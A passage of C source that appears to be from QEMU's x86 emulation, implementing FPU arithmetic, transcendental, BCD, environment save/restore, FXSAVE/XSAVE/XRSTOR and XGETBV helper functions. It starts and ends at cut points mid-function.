helper_fucomi_ST0_FT0(CPUX86State *env) { int eflags; int ret; ret = floatx80_compare_quiet(ST0, FT0, &env->fp_status); eflags = cpu_cc_compute_all(env, CC_OP); eflags = (eflags & ~(CC_Z | CC_P | CC_C)) | fcomi_ccval[ret + 1]; CC_SRC = eflags; } void helper_fadd_ST0_FT0(CPUX86State *env) { ST0 = floatx80_add(ST0, FT0, &env->fp_status); } void helper_fmul_ST0_FT0(CPUX86State *env) { ST0 = floatx80_mul(ST0, FT0, &env->fp_status); } void helper_fsub_ST0_FT0(CPUX86State *env) { ST0 = floatx80_sub(ST0, FT0, &env->fp_status); } void helper_fsubr_ST0_FT0(CPUX86State *env) { ST0 = floatx80_sub(FT0, ST0, &env->fp_status); } void helper_fdiv_ST0_FT0(CPUX86State *env) { ST0 = helper_fdiv(env, ST0, FT0); } void helper_fdivr_ST0_FT0(CPUX86State *env) { ST0 = helper_fdiv(env, FT0, ST0); } /* fp operations between STN and ST0 */ void helper_fadd_STN_ST0(CPUX86State *env, int st_index) { ST(st_index) = floatx80_add(ST(st_index), ST0, &env->fp_status); } void helper_fmul_STN_ST0(CPUX86State *env, int st_index) { ST(st_index) = floatx80_mul(ST(st_index), ST0, &env->fp_status); } void helper_fsub_STN_ST0(CPUX86State *env, int st_index) { ST(st_index) = floatx80_sub(ST(st_index), ST0, &env->fp_status); } void helper_fsubr_STN_ST0(CPUX86State *env, int st_index) { ST(st_index) = floatx80_sub(ST0, ST(st_index), &env->fp_status); } void helper_fdiv_STN_ST0(CPUX86State *env, int st_index) { floatx80 *p; p = &ST(st_index); *p = helper_fdiv(env, *p, ST0); } void helper_fdivr_STN_ST0(CPUX86State *env, int st_index) { floatx80 *p; p = &ST(st_index); *p = helper_fdiv(env, ST0, *p); } /* misc FPU operations */ void helper_fchs_ST0(CPUX86State *env) { ST0 = floatx80_chs(ST0); } void helper_fabs_ST0(CPUX86State *env) { ST0 = floatx80_abs(ST0); } void helper_fld1_ST0(CPUX86State *env) { //ST0 = floatx80_one; floatx80 one = { 0x8000000000000000LL, 0x3fff }; ST0 = one; } void helper_fldl2t_ST0(CPUX86State *env) { //ST0 = floatx80_l2t; floatx80 l2t = { 0xd49a784bcd1b8afeLL, 0x4000 }; ST0 = l2t; } void helper_fldl2e_ST0(CPUX86State *env) { //ST0 = floatx80_l2e; floatx80 l2e = { 0xb8aa3b295c17f0bcLL, 0x3fff }; ST0 = l2e; } void helper_fldpi_ST0(CPUX86State *env) { //ST0 = floatx80_pi; floatx80 pi = { 
0xc90fdaa22168c235LL, 0x4000 }; ST0 = pi; } void helper_fldlg2_ST0(CPUX86State *env) { //ST0 = floatx80_lg2; floatx80 lg2 = { 0x9a209a84fbcff799LL, 0x3ffd }; ST0 = lg2; } void helper_fldln2_ST0(CPUX86State *env) { //ST0 = floatx80_ln2; floatx80 ln2 = { 0xb17217f7d1cf79acLL, 0x3ffe }; ST0 = ln2; } void helper_fldz_ST0(CPUX86State *env) { //ST0 = floatx80_zero; floatx80 zero = { 0x0000000000000000LL, 0x0000 }; ST0 = zero; } void helper_fldz_FT0(CPUX86State *env) { //FT0 = floatx80_zero; floatx80 zero = { 0x0000000000000000LL, 0x0000 }; FT0 = zero; } uint32_t helper_fnstsw(CPUX86State *env) { return (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11; } uint32_t helper_fnstcw(CPUX86State *env) { return env->fpuc; } void update_fp_status(CPUX86State *env) { int rnd_type; /* set rounding mode */ switch (env->fpuc & FPU_RC_MASK) { default: case FPU_RC_NEAR: rnd_type = float_round_nearest_even; break; case FPU_RC_DOWN: rnd_type = float_round_down; break; case FPU_RC_UP: rnd_type = float_round_up; break; case FPU_RC_CHOP: rnd_type = float_round_to_zero; break; } set_float_rounding_mode(rnd_type, &env->fp_status); switch ((env->fpuc >> 8) & 3) { case 0: rnd_type = 32; break; case 2: rnd_type = 64; break; case 3: default: rnd_type = 80; break; } set_floatx80_rounding_precision(rnd_type, &env->fp_status); } void helper_fldcw(CPUX86State *env, uint32_t val) { cpu_set_fpuc(env, val); } void helper_fclex(CPUX86State *env) { env->fpus &= 0x7f00; } void helper_fwait(CPUX86State *env) { if (env->fpus & FPUS_SE) { fpu_raise_exception(env, GETPC()); } } static void do_fninit(CPUX86State *env) { env->fpus = 0; env->fpstt = 0; env->fpcs = 0; env->fpds = 0; env->fpip = 0; env->fpdp = 0; cpu_set_fpuc(env, 0x37f); env->fptags[0] = 1; env->fptags[1] = 1; env->fptags[2] = 1; env->fptags[3] = 1; env->fptags[4] = 1; env->fptags[5] = 1; env->fptags[6] = 1; env->fptags[7] = 1; } void helper_fninit(CPUX86State *env) { do_fninit(env); } /* BCD ops */ void helper_fbld_ST0(CPUX86State *env, target_ulong ptr) { floatx80 tmp; uint64_t val; unsigned int v; int i; val = 0; for (i = 8; i >= 0; i--) { v = cpu_ldub_data_ra(env, ptr + i, GETPC()); val = (val * 100) + ((v >> 4) * 10) + (v & 0xf); } tmp = int64_to_floatx80(val, &env->fp_status); if (cpu_ldub_data_ra(env, ptr + 9, GETPC()) & 0x80) { tmp = floatx80_chs(tmp); } fpush(env); ST0 = tmp; } void helper_fbst_ST0(CPUX86State *env, target_ulong ptr) { int v; target_ulong mem_ref, mem_end; int64_t val; val = floatx80_to_int64(ST0, &env->fp_status); mem_ref = ptr; mem_end = mem_ref + 9; if (val < 0) { cpu_stb_data_ra(env, mem_end, 0x80, GETPC()); if (val != 0x8000000000000000LL) { val = -val; } } else { cpu_stb_data_ra(env, mem_end, 0x00, GETPC()); } while (mem_ref < mem_end) { if (val == 0) { break; } v = val % 100; val = val / 100; v = (int)((unsigned int)(v / 10) << 4) | (v % 10); cpu_stb_data_ra(env, mem_ref++, v, GETPC()); } while (mem_ref < mem_end) { cpu_stb_data_ra(env, mem_ref++, 0, GETPC()); } } void helper_f2xm1(CPUX86State *env) { double val = floatx80_to_double(env, ST0); val = pow(2.0, val) - 1.0; ST0 = double_to_floatx80(env, val); } void helper_fyl2x(CPUX86State *env) { double fptemp = floatx80_to_double(env, ST0); if (fptemp > 0.0) { fptemp = log(fptemp) / log(2.0); /* log2(ST) */ fptemp *= floatx80_to_double(env, ST1); ST1 = double_to_floatx80(env, fptemp); fpop(env); } else { env->fpus &= ~0x4700; env->fpus |= 0x400; } } void helper_fptan(CPUX86State *env) { double fptemp = floatx80_to_double(env, ST0); if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { env->fpus |= 
0x400; } else { floatx80 one = { 0x8000000000000000LL, 0x3fff }; fptemp = tan(fptemp); ST0 = double_to_floatx80(env, fptemp); fpush(env); ST0 = one; env->fpus &= ~0x400; /* C2 <-- 0 */ /* the above code is for |arg| < 2**52 only */ } } void helper_fpatan(CPUX86State *env) { double fptemp, fpsrcop; fpsrcop = floatx80_to_double(env, ST1); fptemp = floatx80_to_double(env, ST0); ST1 = double_to_floatx80(env, atan2(fpsrcop, fptemp)); fpop(env); } void helper_fxtract(CPUX86State *env) { CPU_LDoubleU temp; temp.d = ST0; if (floatx80_is_zero(ST0)) { /* Easy way to generate -inf and raising division by 0 exception */ floatx80 zero = { 0x0000000000000000LL, 0x0000 }; floatx80 one = { 0x8000000000000000LL, 0x3fff }; ST0 = floatx80_div(floatx80_chs(one), zero, &env->fp_status); fpush(env); ST0 = temp.d; } else { int expdif; expdif = EXPD(temp) - EXPBIAS; /* DP exponent bias */ ST0 = int32_to_floatx80(expdif, &env->fp_status); fpush(env); BIASEXPONENT(temp); ST0 = temp.d; } } void helper_fprem1(CPUX86State *env) { double st0, st1, dblq, fpsrcop, fptemp; CPU_LDoubleU fpsrcop1, fptemp1; int expdif; signed long long int q; st0 = floatx80_to_double(env, ST0); st1 = floatx80_to_double(env, ST1); if (isinf(st0) || isnan(st0) || isnan(st1) || (st1 == 0.0)) { ST0 = double_to_floatx80(env, NAN); /* NaN */ env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ return; } fpsrcop = st0; fptemp = st1; fpsrcop1.d = ST0; fptemp1.d = ST1; expdif = EXPD(fpsrcop1) - EXPD(fptemp1); if (expdif < 0) { /* optimisation? taken from the AMD docs */ env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ /* ST0 is unchanged */ return; } if (expdif < 53) { dblq = fpsrcop / fptemp; /* round dblq towards nearest integer */ dblq = rint(dblq); st0 = fpsrcop - fptemp * dblq; /* convert dblq to q by truncating towards zero */ if (dblq < 0.0) { q = (signed long long int)(-dblq); } else { q = (signed long long int)dblq; } env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ /* (C0,C3,C1) <-- (q2,q1,q0) */ env->fpus |= (q & 0x4) << (8 - 2); /* (C0) <-- q2 */ env->fpus |= (q & 0x2) << (14 - 1); /* (C3) <-- q1 */ env->fpus |= (q & 0x1) << (9 - 0); /* (C1) <-- q0 */ } else { env->fpus |= 0x400; /* C2 <-- 1 */ fptemp = pow(2.0, expdif - 50); fpsrcop = (st0 / st1) / fptemp; /* fpsrcop = integer obtained by chopping */ fpsrcop = (fpsrcop < 0.0) ? -(floor(fabs(fpsrcop))) : floor(fpsrcop); st0 -= (st1 * fpsrcop * fptemp); } ST0 = double_to_floatx80(env, st0); } void helper_fprem(CPUX86State *env) { double st0, st1, dblq, fpsrcop, fptemp; CPU_LDoubleU fpsrcop1, fptemp1; int expdif; signed long long int q; st0 = floatx80_to_double(env, ST0); st1 = floatx80_to_double(env, ST1); if (isinf(st0) || isnan(st0) || isnan(st1) || (st1 == 0.0)) { ST0 = double_to_floatx80(env, NAN); /* NaN */ env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ return; } fpsrcop = st0; fptemp = st1; fpsrcop1.d = ST0; fptemp1.d = ST1; expdif = EXPD(fpsrcop1) - EXPD(fptemp1); if (expdif < 0) { /* optimisation? taken from the AMD docs */ env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ /* ST0 is unchanged */ return; } if (expdif < 53) { dblq = fpsrcop / fptemp; /* ST0 / ST1 */ /* round dblq towards zero */ dblq = (dblq < 0.0) ? 
ceil(dblq) : floor(dblq); st0 = fpsrcop - fptemp * dblq; /* fpsrcop is ST0 */ /* convert dblq to q by truncating towards zero */ if (dblq < 0.0) { q = (signed long long int)(-dblq); } else { q = (signed long long int)dblq; } env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ /* (C0,C3,C1) <-- (q2,q1,q0) */ env->fpus |= (q & 0x4) << (8 - 2); /* (C0) <-- q2 */ env->fpus |= (q & 0x2) << (14 - 1); /* (C3) <-- q1 */ env->fpus |= (q & 0x1) << (9 - 0); /* (C1) <-- q0 */ } else { int N = 32 + (expdif % 32); /* as per AMD docs */ env->fpus |= 0x400; /* C2 <-- 1 */ fptemp = pow(2.0, (double)(expdif - N)); fpsrcop = (st0 / st1) / fptemp; /* fpsrcop = integer obtained by chopping */ fpsrcop = (fpsrcop < 0.0) ? -(floor(fabs(fpsrcop))) : floor(fpsrcop); st0 -= (st1 * fpsrcop * fptemp); } ST0 = double_to_floatx80(env, st0); } void helper_fyl2xp1(CPUX86State *env) { double fptemp = floatx80_to_double(env, ST0); if ((fptemp + 1.0) > 0.0) { fptemp = log(fptemp + 1.0) / log(2.0); /* log2(ST + 1.0) */ fptemp *= floatx80_to_double(env, ST1); ST1 = double_to_floatx80(env, fptemp); fpop(env); } else { env->fpus &= ~0x4700; env->fpus |= 0x400; } } void helper_fsqrt(CPUX86State *env) { if (floatx80_is_neg(ST0)) { env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ env->fpus |= 0x400; } ST0 = floatx80_sqrt(ST0, &env->fp_status); } void helper_fsincos(CPUX86State *env) { double fptemp = floatx80_to_double(env, ST0); if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { env->fpus |= 0x400; } else { ST0 = double_to_floatx80(env, sin(fptemp)); fpush(env); ST0 = double_to_floatx80(env, cos(fptemp)); env->fpus &= ~0x400; /* C2 <-- 0 */ /* the above code is for |arg| < 2**63 only */ } } void helper_frndint(CPUX86State *env) { ST0 = floatx80_round_to_int(ST0, &env->fp_status); } void helper_fscale(CPUX86State *env) { if (floatx80_is_any_nan(ST1)) { ST0 = ST1; } else { int n = floatx80_to_int32_round_to_zero(ST1, &env->fp_status); ST0 = floatx80_scalbn(ST0, n, &env->fp_status); } } void helper_fsin(CPUX86State *env) { double fptemp = floatx80_to_double(env, ST0); if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { env->fpus |= 0x400; } else { ST0 = double_to_floatx80(env, sin(fptemp)); env->fpus &= ~0x400; /* C2 <-- 0 */ /* the above code is for |arg| < 2**53 only */ } } void helper_fcos(CPUX86State *env) { double fptemp = floatx80_to_double(env, ST0); if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { env->fpus |= 0x400; } else { ST0 = double_to_floatx80(env, cos(fptemp)); env->fpus &= ~0x400; /* C2 <-- 0 */ /* the above code is for |arg| < 2**63 only */ } } void helper_fxam_ST0(CPUX86State *env) { CPU_LDoubleU temp; int expdif; temp.d = ST0; env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ if (SIGND(temp)) { env->fpus |= 0x200; /* C1 <-- 1 */ } if (env->fptags[env->fpstt]) { env->fpus |= 0x4100; /* Empty */ return; } expdif = EXPD(temp); if (expdif == MAXEXPD) { if (MANTD(temp) == 0x8000000000000000ULL) { env->fpus |= 0x500; /* Infinity */ } else { env->fpus |= 0x100; /* NaN */ } } else if (expdif == 0) { if (MANTD(temp) == 0) { env->fpus |= 0x4000; /* Zero */ } else { env->fpus |= 0x4400; /* Denormal */ } } else { env->fpus |= 0x400; } } static void do_fstenv(CPUX86State *env, target_ulong ptr, int data32, uintptr_t retaddr) { int fpus, fptag, exp, i; uint64_t mant; CPU_LDoubleU tmp; fpus = (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11; fptag = 0; for (i = 7; i >= 0; i--) { fptag <<= 2; if (env->fptags[i]) { fptag |= 3; } else { tmp.d = env->fpregs[i].d; exp = EXPD(tmp); mant = MANTD(tmp); if (exp == 0 && mant == 0) { /* zero */ 
fptag |= 1; } else if (exp == 0 || exp == MAXEXPD || (mant & (1ULL << 63)) == 0) { /* NaNs, infinity, denormal */ fptag |= 2; } } } if (data32) { /* 32 bit */ cpu_stl_data_ra(env, ptr, env->fpuc, retaddr); cpu_stl_data_ra(env, ptr + 4, fpus, retaddr); cpu_stl_data_ra(env, ptr + 8, fptag, retaddr); cpu_stl_data_ra(env, ptr + 12, env->fpip, retaddr); /* fpip */ cpu_stl_data_ra(env, ptr + 16, env->fpcs, retaddr); /* fpcs */ cpu_stl_data_ra(env, ptr + 20, env->fpdp, retaddr); /* fpoo */ cpu_stl_data_ra(env, ptr + 24, env->fpds, retaddr); /* fpos */ } else { /* 16 bit */ cpu_stw_data_ra(env, ptr, env->fpuc, retaddr); cpu_stw_data_ra(env, ptr + 2, fpus, retaddr); cpu_stw_data_ra(env, ptr + 4, fptag, retaddr); cpu_stw_data_ra(env, ptr + 6, env->fpip, retaddr); cpu_stw_data_ra(env, ptr + 8, env->fpcs, retaddr); cpu_stw_data_ra(env, ptr + 10, env->fpdp, retaddr); cpu_stw_data_ra(env, ptr + 12, env->fpds, retaddr); } } void helper_fstenv(CPUX86State *env, target_ulong ptr, int data32) { do_fstenv(env, ptr, data32, GETPC()); } static void cpu_set_fpus(CPUX86State *env, uint16_t fpus) { env->fpstt = (fpus >> 11) & 7; env->fpus = fpus & ~0x3800 & ~FPUS_B; env->fpus |= env->fpus & FPUS_SE ? FPUS_B : 0; if (!(env->fpus & FPUS_SE)) { /* * Here the processor deasserts FERR#; in response, the chipset deasserts * IGNNE#. */ cpu_clear_ignne(env); } } static void do_fldenv(CPUX86State *env, target_ulong ptr, int data32, uintptr_t retaddr) { int i, fpus, fptag; if (data32) { cpu_set_fpuc(env, cpu_lduw_data_ra(env, ptr, retaddr)); fpus = cpu_lduw_data_ra(env, ptr + 4, retaddr); fptag = cpu_lduw_data_ra(env, ptr + 8, retaddr); } else { cpu_set_fpuc(env, cpu_lduw_data_ra(env, ptr, retaddr)); fpus = cpu_lduw_data_ra(env, ptr + 2, retaddr); fptag = cpu_lduw_data_ra(env, ptr + 4, retaddr); } cpu_set_fpus(env, fpus); for (i = 0; i < 8; i++) { env->fptags[i] = ((fptag & 3) == 3); fptag >>= 2; } } void helper_fldenv(CPUX86State *env, target_ulong ptr, int data32) { do_fldenv(env, ptr, data32, GETPC()); } void helper_fsave(CPUX86State *env, target_ulong ptr, int data32) { floatx80 tmp; int i; do_fstenv(env, ptr, data32, GETPC()); ptr += (14 << data32); for (i = 0; i < 8; i++) { tmp = ST(i); helper_fstt(env, tmp, ptr, GETPC()); ptr += 10; } do_fninit(env); } void helper_frstor(CPUX86State *env, target_ulong ptr, int data32) { floatx80 tmp; int i; do_fldenv(env, ptr, data32, GETPC()); ptr += (14 << data32); for (i = 0; i < 8; i++) { tmp = helper_fldt(env, ptr, GETPC()); ST(i) = tmp; ptr += 10; } } #define XO(X) offsetof(X86XSaveArea, X) static void do_xsave_fpu(CPUX86State *env, target_ulong ptr, uintptr_t ra) { int fpus, fptag, i; target_ulong addr; fpus = (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11; fptag = 0; for (i = 0; i < 8; i++) { fptag |= (env->fptags[i] << i); } cpu_stw_data_ra(env, ptr + XO(legacy.fcw), env->fpuc, ra); cpu_stw_data_ra(env, ptr + XO(legacy.fsw), fpus, ra); cpu_stw_data_ra(env, ptr + XO(legacy.ftw), fptag ^ 0xff, ra); /* In 32-bit mode this is eip, sel, dp, sel. In 64-bit mode this is rip, rdp. But in either case we don't write actual data, just zeros. 
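do_fstenv() above packs two tag bits per x87 register: 00 valid, 01 zero, 10 special (NaN, infinity, denormal or unnormal), 11 empty. A stand-alone restatement of that classification; tag_for() is an invented name and the constants mirror the EXPD/MANTD usage above.

#include <stdio.h>
#include <stdint.h>

#define MAXEXPD 0x7fff

static int tag_for(uint16_t exp, uint64_t mant, int empty)
{
    if (empty)
        return 3;
    if (exp == 0 && mant == 0)
        return 1;                               /* zero */
    if (exp == 0 || exp == MAXEXPD || !(mant & (1ULL << 63)))
        return 2;                               /* special */
    return 0;                                   /* valid */
}

int main(void)
{
    printf("1.0   -> %d\n", tag_for(0x3fff, 0x8000000000000000ULL, 0));
    printf("0.0   -> %d\n", tag_for(0x0000, 0, 0));
    printf("+inf  -> %d\n", tag_for(MAXEXPD, 0x8000000000000000ULL, 0));
    printf("empty -> %d\n", tag_for(0, 0, 1));
    return 0;
}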
*/ cpu_stq_data_ra(env, ptr + XO(legacy.fpip), env->fpip, ra); /* eip+sel; rip */ cpu_stq_data_ra(env, ptr + XO(legacy.fpdp), 0, ra); /* edp+sel; rdp */ addr = ptr + XO(legacy.fpregs); for (i = 0; i < 8; i++) { floatx80 tmp = ST(i); helper_fstt(env, tmp, addr, ra); addr += 16; } } static void do_xsave_mxcsr(CPUX86State *env, target_ulong ptr, uintptr_t ra) { cpu_stl_data_ra(env, ptr + XO(legacy.mxcsr), env->mxcsr, ra); cpu_stl_data_ra(env, ptr + XO(legacy.mxcsr_mask), 0x0000ffff, ra); } static void do_xsave_sse(CPUX86State *env, target_ulong ptr, uintptr_t ra) { int i, nb_xmm_regs; target_ulong addr; if (env->hflags & HF_CS64_MASK) { nb_xmm_regs = 16; } else { nb_xmm_regs = 8; } addr = ptr + XO(legacy.xmm_regs); for (i = 0; i < nb_xmm_regs; i++) { cpu_stq_data_ra(env, addr, env->xmm_regs[i].ZMM_Q(0), ra); cpu_stq_data_ra(env, addr + 8, env->xmm_regs[i].ZMM_Q(1), ra); addr += 16; } } static void do_xsave_bndregs(CPUX86State *env, target_ulong ptr, uintptr_t ra) { target_ulong addr = ptr + offsetof(XSaveBNDREG, bnd_regs); int i; for (i = 0; i < 4; i++, addr += 16) { cpu_stq_data_ra(env, addr, env->bnd_regs[i].lb, ra); cpu_stq_data_ra(env, addr + 8, env->bnd_regs[i].ub, ra); } } static void do_xsave_bndcsr(CPUX86State *env, target_ulong ptr, uintptr_t ra) { cpu_stq_data_ra(env, ptr + offsetof(XSaveBNDCSR, bndcsr.cfgu), env->bndcs_regs.cfgu, ra); cpu_stq_data_ra(env, ptr + offsetof(XSaveBNDCSR, bndcsr.sts), env->bndcs_regs.sts, ra); } static void do_xsave_pkru(CPUX86State *env, target_ulong ptr, uintptr_t ra) { cpu_stq_data_ra(env, ptr, env->pkru, ra); } void helper_fxsave(CPUX86State *env, target_ulong ptr) { uintptr_t ra = GETPC(); /* The operand must be 16 byte aligned */ if (ptr & 0xf) { raise_exception_ra(env, EXCP0D_GPF, ra); } do_xsave_fpu(env, ptr, ra); if (env->cr[4] & CR4_OSFXSR_MASK) { do_xsave_mxcsr(env, ptr, ra); /* Fast FXSAVE leaves out the XMM registers */ if (!(env->efer & MSR_EFER_FFXSR) || (env->hflags & HF_CPL_MASK) || !(env->hflags & HF_LMA_MASK)) { do_xsave_sse(env, ptr, ra); } } } static uint64_t get_xinuse(CPUX86State *env) { uint64_t inuse = -1; /* For the most part, we don't track XINUSE. We could calculate it here for all components, but it's probably less work to simply indicate in use. That said, the state of BNDREGS is important enough to track in HFLAGS, so we might as well use that here. */ if ((env->hflags & HF_MPX_IU_MASK) == 0) { inuse &= ~XSTATE_BNDREGS_MASK; } return inuse; } static void do_xsave(CPUX86State *env, target_ulong ptr, uint64_t rfbm, uint64_t inuse, uint64_t opt, uintptr_t ra) { uint64_t old_bv, new_bv; /* The OS must have enabled XSAVE. */ if (!(env->cr[4] & CR4_OSXSAVE_MASK)) { raise_exception_ra(env, EXCP06_ILLOP, ra); } /* The operand must be 64 byte aligned. */ if (ptr & 63) { raise_exception_ra(env, EXCP0D_GPF, ra); } /* Never save anything not enabled by XCR0. */ rfbm &= env->xcr0; opt &= rfbm; if (opt & XSTATE_FP_MASK) { do_xsave_fpu(env, ptr, ra); } if (rfbm & XSTATE_SSE_MASK) { /* Note that saving MXCSR is not suppressed by XSAVEOPT. */ do_xsave_mxcsr(env, ptr, ra); } if (opt & XSTATE_SSE_MASK) { do_xsave_sse(env, ptr, ra); } if (opt & XSTATE_BNDREGS_MASK) { do_xsave_bndregs(env, ptr + XO(bndreg_state), ra); } if (opt & XSTATE_BNDCSR_MASK) { do_xsave_bndcsr(env, ptr + XO(bndcsr_state), ra); } if (opt & XSTATE_PKRU_MASK) { do_xsave_pkru(env, ptr + XO(pkru_state), ra); } /* Update the XSTATE_BV field. 
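The merge performed just below keeps the saved bit for every component outside RFBM and substitutes the in-use bit for every component inside it. A worked example, with component bit numbers following XCR0 (0 = x87, 1 = SSE, 2 = AVX):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint64_t old_bv = 0x07; /* header says x87+SSE+AVX were saved earlier */
    uint64_t rfbm   = 0x03; /* this XSAVE covers only x87+SSE */
    uint64_t inuse  = 0x01; /* and only x87 is actually in use */

    /* the same expression as the code below */
    uint64_t new_bv = (old_bv & ~rfbm) | (inuse & rfbm);
    printf("xstate_bv %#llx -> %#llx\n",
           (unsigned long long)old_bv, (unsigned long long)new_bv);
    /* prints 0x7 -> 0x5: the SSE bit is cleared, the AVX bit untouched */
    return 0;
}

Clearing a bit this way is what lets a later XRSTOR skip the component and load its init state instead.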
*/ old_bv = cpu_ldq_data_ra(env, ptr + XO(header.xstate_bv), ra); new_bv = (old_bv & ~rfbm) | (inuse & rfbm); cpu_stq_data_ra(env, ptr + XO(header.xstate_bv), new_bv, ra); } void helper_xsave(CPUX86State *env, target_ulong ptr, uint64_t rfbm) { do_xsave(env, ptr, rfbm, get_xinuse(env), -1, GETPC()); } void helper_xsaveopt(CPUX86State *env, target_ulong ptr, uint64_t rfbm) { uint64_t inuse = get_xinuse(env); do_xsave(env, ptr, rfbm, inuse, inuse, GETPC()); } static void do_xrstor_fpu(CPUX86State *env, target_ulong ptr, uintptr_t ra) { int i, fpuc, fpus, fptag; target_ulong addr; fpuc = cpu_lduw_data_ra(env, ptr + XO(legacy.fcw), ra); fpus = cpu_lduw_data_ra(env, ptr + XO(legacy.fsw), ra); fptag = cpu_lduw_data_ra(env, ptr + XO(legacy.ftw), ra); cpu_set_fpuc(env, fpuc); cpu_set_fpus(env, fpus); fptag ^= 0xff; for (i = 0; i < 8; i++) { env->fptags[i] = ((fptag >> i) & 1); } addr = ptr + XO(legacy.fpregs); for (i = 0; i < 8; i++) { floatx80 tmp = helper_fldt(env, addr, ra); ST(i) = tmp; addr += 16; } } static void do_xrstor_mxcsr(CPUX86State *env, target_ulong ptr, uintptr_t ra) { cpu_set_mxcsr(env, cpu_ldl_data_ra(env, ptr + XO(legacy.mxcsr), ra)); } static void do_xrstor_sse(CPUX86State *env, target_ulong ptr, uintptr_t ra) { int i, nb_xmm_regs; target_ulong addr; if (env->hflags & HF_CS64_MASK) { nb_xmm_regs = 16; } else { nb_xmm_regs = 8; } addr = ptr + XO(legacy.xmm_regs); for (i = 0; i < nb_xmm_regs; i++) { env->xmm_regs[i].ZMM_Q(0) = cpu_ldq_data_ra(env, addr, ra); env->xmm_regs[i].ZMM_Q(1) = cpu_ldq_data_ra(env, addr + 8, ra); addr += 16; } } static void do_xrstor_bndregs(CPUX86State *env, target_ulong ptr, uintptr_t ra) { target_ulong addr = ptr + offsetof(XSaveBNDREG, bnd_regs); int i; for (i = 0; i < 4; i++, addr += 16) { env->bnd_regs[i].lb = cpu_ldq_data_ra(env, addr, ra); env->bnd_regs[i].ub = cpu_ldq_data_ra(env, addr + 8, ra); } } static void do_xrstor_bndcsr(CPUX86State *env, target_ulong ptr, uintptr_t ra) { /* FIXME: Extend highest implemented bit of linear address. */ env->bndcs_regs.cfgu = cpu_ldq_data_ra(env, ptr + offsetof(XSaveBNDCSR, bndcsr.cfgu), ra); env->bndcs_regs.sts = cpu_ldq_data_ra(env, ptr + offsetof(XSaveBNDCSR, bndcsr.sts), ra); } static void do_xrstor_pkru(CPUX86State *env, target_ulong ptr, uintptr_t ra) { env->pkru = cpu_ldq_data_ra(env, ptr, ra); } void helper_fxrstor(CPUX86State *env, target_ulong ptr) { uintptr_t ra = GETPC(); /* The operand must be 16 byte aligned */ if (ptr & 0xf) { raise_exception_ra(env, EXCP0D_GPF, ra); } do_xrstor_fpu(env, ptr, ra); if (env->cr[4] & CR4_OSFXSR_MASK) { do_xrstor_mxcsr(env, ptr, ra); /* Fast FXRSTOR leaves out the XMM registers */ if (!(env->efer & MSR_EFER_FFXSR) || (env->hflags & HF_CPL_MASK) || !(env->hflags & HF_LMA_MASK)) { do_xrstor_sse(env, ptr, ra); } } } void helper_xrstor(CPUX86State *env, target_ulong ptr, uint64_t rfbm) { uintptr_t ra = GETPC(); uint64_t xstate_bv, xcomp_bv, reserve0; rfbm &= env->xcr0; /* The OS must have enabled XSAVE. */ if (!(env->cr[4] & CR4_OSXSAVE_MASK)) { raise_exception_ra(env, EXCP06_ILLOP, ra); } /* The operand must be 64 byte aligned. */ if (ptr & 63) { raise_exception_ra(env, EXCP0D_GPF, ra); } xstate_bv = cpu_ldq_data_ra(env, ptr + XO(header.xstate_bv), ra); if ((int64_t)xstate_bv < 0) { /* FIXME: Compact form. */ raise_exception_ra(env, EXCP0D_GPF, ra); } /* Standard form. */ /* The XSTATE_BV field must not set bits not present in XCR0. */ if (xstate_bv & ~env->xcr0) { raise_exception_ra(env, EXCP0D_GPF, ra); } /* The XCOMP_BV field must be zero. 
Note that, as of the April 2016 revision, the description of the XSAVE Header (Vol 1, Sec 13.4.2) describes only XCOMP_BV, but the description of the standard form of XRSTOR (Vol 1, Sec 13.8.1) checks bytes 23:8 for zero, which includes the next 64-bit field. */ xcomp_bv = cpu_ldq_data_ra(env, ptr + XO(header.xcomp_bv), ra); reserve0 = cpu_ldq_data_ra(env, ptr + XO(header.reserve0), ra); if (xcomp_bv || reserve0) { raise_exception_ra(env, EXCP0D_GPF, ra); } if (rfbm & XSTATE_FP_MASK) { if (xstate_bv & XSTATE_FP_MASK) { do_xrstor_fpu(env, ptr, ra); } else { do_fninit(env); memset(env->fpregs, 0, sizeof(env->fpregs)); } } if (rfbm & XSTATE_SSE_MASK) { /* Note that the standard form of XRSTOR loads MXCSR from memory whether or not the XSTATE_BV bit is set. */ do_xrstor_mxcsr(env, ptr, ra); if (xstate_bv & XSTATE_SSE_MASK) { do_xrstor_sse(env, ptr, ra); } else { /* ??? When AVX is implemented, we may have to be more selective in the clearing. */ memset(env->xmm_regs, 0, sizeof(env->xmm_regs)); } } if (rfbm & XSTATE_BNDREGS_MASK) { if (xstate_bv & XSTATE_BNDREGS_MASK) { do_xrstor_bndregs(env, ptr + XO(bndreg_state), ra); env->hflags |= HF_MPX_IU_MASK; } else { memset(env->bnd_regs, 0, sizeof(env->bnd_regs)); env->hflags &= ~HF_MPX_IU_MASK; } } if (rfbm & XSTATE_BNDCSR_MASK) { if (xstate_bv & XSTATE_BNDCSR_MASK) { do_xrstor_bndcsr(env, ptr + XO(bndcsr_state), ra); } else { memset(&env->bndcs_regs, 0, sizeof(env->bndcs_regs)); } cpu_sync_bndcs_hflags(env); } if (rfbm & XSTATE_PKRU_MASK) { uint64_t old_pkru = env->pkru; if (xstate_bv & XSTATE_PKRU_MASK) { do_xrstor_pkru(env, ptr + XO(pkru_state), ra); } else { env->pkru = 0; } if (env->pkru != old_pkru) { CPUState *cs = env_cpu(env); tlb_flush(cs); } } } #undef XO uint64_t helper_xgetbv(CPUX86State *env, uint32_t ecx) { /* The OS must have enabled XSAVE. */ if (!(env->cr[4] & CR4_OSXSAVE_MASK)) { raise_exception_ra(env, EXCP06_ILLOP, GETPC()); } switch 